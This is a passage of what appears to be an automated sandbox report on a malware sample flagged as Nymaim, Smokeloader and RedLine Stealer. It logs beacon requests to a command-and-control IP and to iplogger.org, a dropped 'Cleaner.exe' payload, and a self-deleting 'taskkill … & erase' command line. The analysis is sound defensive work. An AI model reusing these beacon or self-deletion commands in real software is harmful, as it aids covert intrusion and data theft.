Oct 3, 2022 17:44:04.922621965 CEST	4684	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:44:05.470845938 CEST	4684	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:44:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:44:07.506227016 CEST	4685	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:44:08.069984913 CEST	4685	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:44:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Oct 3, 2022 17:44:10.115916967 CEST	4686	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:44:10.645729065 CEST	4686	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:44:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49712	148.251.234.83	443	C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-03 15:43:01 UTC	0	OUT	GET /1Pz8p7 HTTP/1.1 User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 Host: iplogger.org Connection: Keep-Alive
2022-10-03 15:43:01 UTC	0	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 03 Oct 2022 15:43:01 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close Set-Cookie: clhf03028ja=102.129.143.15; expires=Tue, 03-Oct-2023 15:43:01 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: 333625791719766799=2; expires=Tue, 03-Oct-2023 15:43:01 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Expires: Mon, 03 Oct 2022 15:43:01 +0000 Cache-Control: no-store, no-cache, must-revalidate Strict-Transport-Security: max-age=31536000 X-Frame-Options: SAMEORIGIN
2022-10-03 15:43:01 UTC	0	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 6136, Parent PID: 3452

General

Target ID:	0
Start time:	17:41:51
Start date:	03/10/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	238080 bytes
MD5 hash:	526FDE9E61B1B4835885973331FA1616
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.279758880.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.249294032.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.242144552.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.256623914.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.256985084.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.265693702.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.265693702.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.260710969.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.257076195.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.248840662.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.284332741.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.279883585.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.252473091.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.279213027.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.260888078.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.242004728.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.261380699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.285645764.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.279352370.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.241291964.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.284571510.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.265965257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.242584776.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.266223376.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.265443636.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.253125485.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.265525344.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.249185873.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.248750615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.256511336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.242671157.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.285927973.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.261685846.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.252969697.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.252332121.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6120, Parent PID: 6136

General

Target ID:	2
Start time:	17:41:54
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 532
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 3016, Parent PID: 6136

General

Target ID:	4
Start time:	17:41:57
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 700
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4728, Parent PID: 6136

General

Target ID:	6
Start time:	17:41:59
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 700
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4156, Parent PID: 6136

General

Target ID:	8
Start time:	17:42:01
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 720
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 2140, Parent PID: 6136

General

Target ID:	10
Start time:	17:42:03
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 776
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4708, Parent PID: 6136

General

Target ID:	12
Start time:	17:42:06
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 868
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 5928, Parent PID: 6136

General

Target ID:	14
Start time:	17:42:11
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 880
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 1680, Parent PID: 6136

General

Target ID:	20
Start time:	17:42:15
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 976
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 1324, Parent PID: 6136

General

Target ID:	27
Start time:	17:42:38
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1268
Imagebase:	0x30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5144, Parent PID: 6136

General

Target ID:	28
Start time:	17:42:39
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5112, Parent PID: 5144

General

Target ID:	29
Start time:	17:42:40
Start date:	03/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: Cleaner.exePID: 4628, Parent PID: 5144

General

Target ID:	30
Start time:	17:42:40
Start date:	03/10/2022
Path:	C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe"
Imagebase:	0x22e68860000
File size:	3947920 bytes
MD5 hash:	04514BD4962F7D60679434E0EBE49184
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 29%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 5216, Parent PID: 6136

General

Target ID:	32
Start time:	17:43:10
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1556
Imagebase:	0x7ff6da640000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6044, Parent PID: 6136

General

Target ID:	35
Start time:	17:44:12
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6060, Parent PID: 6044

General

Target ID:	36
Start time:	17:44:12
Start date:	03/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 6080, Parent PID: 6044

General

Target ID:	37
Start time:	17:44:12
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im "file.exe" /f
Imagebase:	0xe10000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Cleaner.exePID: 4628, Parent PID: 5144COMMON

Executed Functions

Function 00007FFCA0CB116B Relevance: 2.4, Strings: 1, Instructions: 1195COMMON

Download Yara Rule

Strings

Tp_H, xrefs: 00007FFCA0CB1AFD

Memory Dump Source

Source File: 0000001E.00000002.650663168.00007FFCA0CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffca0cb0000_Cleaner.jbxd

Similarity

API ID:
String ID: Tp_H
API String ID: 0-1962846080
Opcode ID: 33abdeb4564c9d3913981571c91faa9e5b5b99a8a6db85df3871664045552292
Instruction ID: 6fb0574aa0980ce5ca88a9273a393e2e0d1d9174994d49936aabc17e2b190951
Opcode Fuzzy Hash: 33abdeb4564c9d3913981571c91faa9e5b5b99a8a6db85df3871664045552292
Instruction Fuzzy Hash: 3632E112B5AA4F5BE798E73844B92F963D1EF5A384F410979C41EC33D7DD28B80A8352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCA0CB1B2E Relevance: 1.0, Instructions: 1006COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.650663168.00007FFCA0CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffca0cb0000_Cleaner.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97ef192e60557acb01d821971928fe1cf0238c88b0c60600ed5a4f0308703e92
Instruction ID: 265c773176b589067901e6cded7585fe188bf9ab2b45fb37dd888c76ea9c39e6
Opcode Fuzzy Hash: 97ef192e60557acb01d821971928fe1cf0238c88b0c60600ed5a4f0308703e92
Instruction Fuzzy Hash: 7C82D73060D78A8FD76AEB348465BA97BE1EF56304F1508FDC48ACB2A3DE34A845C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCA0CB553E Relevance: .8, Instructions: 809COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.650663168.00007FFCA0CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffca0cb0000_Cleaner.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65acaa85817411e1fd77a25e8b50a93c1e7af3edaf70499b7e3a201d7df1bd92
Instruction ID: aea2edbafa86919acaf2b9c3cd06b3af330bb50505ba47b93800a0451460d1eb
Opcode Fuzzy Hash: 65acaa85817411e1fd77a25e8b50a93c1e7af3edaf70499b7e3a201d7df1bd92
Instruction Fuzzy Hash: 0462953060D7898FD769DB248065BAA77E1EF9A304F1109BDD48EC72E3CE39A845C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCA0CB3F72 Relevance: .6, Instructions: 557COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.650663168.00007FFCA0CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffca0cb0000_Cleaner.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3202921e4b29a58b6ecc7566dd237726268e629e3842bc56a896e18f25a4465a
Instruction ID: 17f53042fc75ac3c5794ffeccb83ed284d7abfe2d090f1b0e741268ad24c3556
Opcode Fuzzy Hash: 3202921e4b29a58b6ecc7566dd237726268e629e3842bc56a896e18f25a4465a
Instruction Fuzzy Hash: C322F77060E78A9FD36AD73484656A97BE1EF56304F1508FDC089CB2F3DE28A846C712

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCA0CB57D8 Relevance: .6, Instructions: 553COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.650663168.00007FFCA0CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffca0cb0000_Cleaner.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47106fcfd1f383c3ebae9755153973466ca08f4a8d341c569e314de66bac147c
Instruction ID: 2f114cb5eed5baa074247b22d4be812f3348ed8bbc168587fd3ae3100a63a5a5
Opcode Fuzzy Hash: 47106fcfd1f383c3ebae9755153973466ca08f4a8d341c569e314de66bac147c
Instruction Fuzzy Hash: BC22C43060D7894FE7A9DB248065BAA77E1EF99304F1109BED48EC73E2CE39A845C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCA0CB4601 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.650663168.00007FFCA0CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA0CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffca0cb0000_Cleaner.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 740605cb405a89072d5bdc29e7ebeae6c2282c7d7fefca840305b19b6b5f4a19
Instruction ID: a7443811da2e8d2b4666509a893e27a6f6556c03f3af12401d8e54ed6f810186
Opcode Fuzzy Hash: 740605cb405a89072d5bdc29e7ebeae6c2282c7d7fefca840305b19b6b5f4a19
